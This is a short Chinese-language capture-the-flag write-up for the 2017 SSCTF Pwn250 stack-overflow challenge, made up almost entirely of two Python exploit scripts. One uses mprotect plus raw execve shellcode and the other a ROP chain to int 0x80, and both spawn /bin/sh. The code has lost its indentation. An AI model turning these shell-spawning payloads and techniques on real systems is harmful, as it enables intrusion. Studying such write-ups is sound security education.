2017- SSCTF-Pwn250

<–more–>
漏洞很简单,栈溢出,如下:

方法一: mprotect 传shellcode

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
#!/usr/bin/env python2
# -*- coding:utf-8 -*-
from pwn import *

# switches

if len(sys.argv) == 1:
DEBUG = 1
else :
DEBUG = 0
# modify this
if DEBUG:
io = process('./250')
#gdb.attach(io,'#b main')
else:
io = remote(sys.argv[1], int(sys.argv[2]))

context(log_level='debug')

# define symbols and offsets here

mprotect = 0x0806E070
main_addr = 0x08048886
read = 0x0806D510
stack = 0x08049000
size = 0x1000
prop = 7

# define exploit function here
def pwn():
io.recvuntil('[InPut Data Size]')
io.sendline('82')
io.recvuntil('[YourData]')
payload1 = 'A' * 62+p32(mprotect)+p32(main_addr)+p32(stack)+p32(size)+p32(prop)
io.send(payload1)
io.recvuntil('[InPut Data Size]')
io.sendline('90')
io.recvuntil('[YourData]')
shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80"
ssize = len(shellcode)
payload2 = 'A' * 62+p32(read)+p32(stack)+p32(0)+p32(stack)+p32(ssize)+'THE END!'
io.send(payload2)
#io.recvuntil('THE END!')
raw_input('send?')
io.send(shellcode)
io.interactive()
return

if __name__ == '__main__':
pwn()

方法二:

int 80 起shell by pxx

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
	
from pwn import*
import time
def pwn(io):
io.read_until("]")
dl_mk_stack_exe = 0x080A0AF0

context(arch = 'i386', os = 'linux')
shellcode = asm(shellcraft.i386.sh())

#0x080e77dc : add ebx, esp ; add dword ptr [edx], ecx ; ret
add_ebx_esp = 0x080e77dc
#0x080481c9 : pop ebx ; ret
p_ebx_ret = 0x080481c9
#0x0804f2ea : mov eax, ebx ; pop ebx ; ret
mov_eax_ebx_p_ret = 0x0804f2ea

#0x0806cbb5 : int 0x80
p_eax_ret = 0x080b89e6
p_ebx_ret = 0x080481c9
p_ecx_ret = 0x080df1b9
p_edx_ret = 0x0806efbb
int80_addr = 0x0806cbb5

read_addr = 0x0806D510
bss_addr = 0x080ece00

payload = ""
payload += "a"*0x3a
payload += l32(0)
payload += gen_rop_data(read_addr, [0, bss_addr, 8])
payload += l32(p_eax_ret)
payload += l32(0xb)
payload += l32(p_ebx_ret)
payload += l32(bss_addr)
payload += l32(p_ecx_ret)
payload += l32(0)
payload += l32(p_edx_ret)
payload += l32(0)
payload += l32(int80_addr)

io.writeline(str(1000))
io.read_until("]")

io.gdb_hint()
io.writeline(payload)
io.read_until("]")

time.sleep(1)
io.writeline("/bin/sh\x00")
io.interact()

io.interact()